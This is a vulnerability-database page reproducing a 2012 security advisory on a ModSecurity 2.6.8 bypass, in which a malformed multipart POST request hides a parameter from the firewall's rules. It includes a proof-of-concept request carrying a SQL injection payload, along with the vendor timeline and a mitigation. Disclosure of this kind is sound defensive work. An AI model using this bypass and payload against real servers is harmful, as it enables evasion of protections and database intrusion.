Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ModSecurity 2.6.8 Bypass

🗓️ 17 Oct 2012 00:00:00Reported by Bernhard MuellerType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 32 Views

ModSecurity 2.6.8 multipart/invalid part ruleset bypass, fixed in 2.7.

Code
`SEC Consult Vulnerability Lab Security Advisory < 20121017-0 >  
=======================================================================  
title: ModSecurity multipart/invalid part ruleset bypass  
product: ModSecurity  
vulnerable version: <= 2.6.8  
fixed version: 2.7.0  
CVE number: -  
impact: Depends what you use it for  
homepage: http://www.modsecurity.org/  
found: 2012-10-12  
by: Bernhard Mueller  
SEC Consult Vulnerability Lab  
https://www.sec-consult.com  
=======================================================================  
  
Vendor/product description:  
---------------------------  
ModSecurity for Apache is a web server plug-in for the Apache web server  
platform. This is the original, most mature and deployed ModSecurity module.  
This module is maintained by the Trustwave SpiderLabs Research Team.  
  
URL: http://www.modsecurity.org/projects/modsecurity/apache/  
  
  
Vulnerability overview/description:  
-----------------------------------  
Validation of POST parameters can be bypassed on Apache/PHP installations by  
sending specially formed multipart requests. A POST parameter's content can be  
hidden from ModSecurity by prepending an invalid part. This first part  
contains only a Content-Disposition header and has an additional carriage  
return inserted at the end of the line ([\r\r\n]). This is followed by a  
boundary in the next line and another Content-Disposition header with a  
filename. The request content looks like this (newlines are all \r\n except in  
line 2).  
  
--A  
Content-Disposition: form-data; name="id"[\r][\r][\n]  
--A  
Content-Disposition: form-data; name="lol"; filename="x"  
  
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--  
  
--A--  
  
ModSecurity skips what it believes to be an invalid first part and proceeds to  
parse the second part. This part is treated as a file and not checked against  
the ruleset.  
  
PHP however treats the whole thing as a single part and processes only the  
first Content-Disposition header, ignoring the second one. In the opinion of  
PHP this request contains a POST parameter with the name specified in the  
first header.  
  
  
Proof of concept:  
-----------------  
  
wut.php:  
--------  
  
<? echo $POST[xxx] ?>  
  
  
POST request:  
-------------  
  
POST /wut.php HTTP/1.1  
Content-Type: multipart/form-data; boundary=A  
Content-Length: 161  
  
--A  
Content-Disposition: form-data; name="xxx"[\r][\r][\n]  
--A  
Content-Disposition: form-data; name="yyy"; filename="z"  
  
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--  
  
--A--  
  
  
Output:  
-------  
  
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--  
  
(any change in the header should produce a 403)  
  
  
Vulnerable / tested versions:  
-----------------------------  
  
This works with ModSecurity up to version 2.6.8.  
  
  
Vendor contact timeline:  
------------------------  
2012-10-11: Contacted ModSecurity  
2012-10-15: ModSecurity guys fixed it  
2012-10-16: New ModSecurity release 2.7.0  
2012-10-17: Public release of advisory  
  
  
Solution:  
---------  
To mitigate this bypass method, upgrade to ModSecurity 2.7.0 and make sure  
that the MULTIPART_INVALID_PART flag is set in the multipart strict validation  
rule. Add the line:  
  
IQ %{MULTIPART_INVALID_PART}, \  
  
to the SecRule MULTIPART_STRICT_ERROR in your ModSecurity configuration file.  
  
Download is available at:  
  
http://www.modsecurity.org/download/  
  
  
  
Advisory URL:  
--------------  
https://www.sec-consult.com/en/advisories.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
The SEC Consult Group  
  
Office Vienna  
Mooslackengasse 17  
A-1190 Vienna  
Austria  
Tel.: +43 / 1 / 890 30 43 - 0  
Fax.: +43 / 1 / 890 30 43 - 25  
Mail: research at sec-consult dot com  
www.sec-consult.com  
  
  
Office Singapore  
4 Battery Road  
#25-01 Bank of China Building  
Singapore (049908)  
Mail: office at sec-consult dot sg  
  
  
Check out our blog at:  
http://blog.sec-consult.com/  
  
  
And this thing here:  
http://wordpress.org/extend/plugins/mvis-security-center/  
  
  
EOF B. Mueller / October 2012  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Oct 2012 00:00Current
7.4High risk
Vulners AI Score7.4
modsecurityapachetrustwave spiderlabsmultipart bypassvulnerabilityadvisorysecconsultphpsecurityupgradevalidation rulecve
32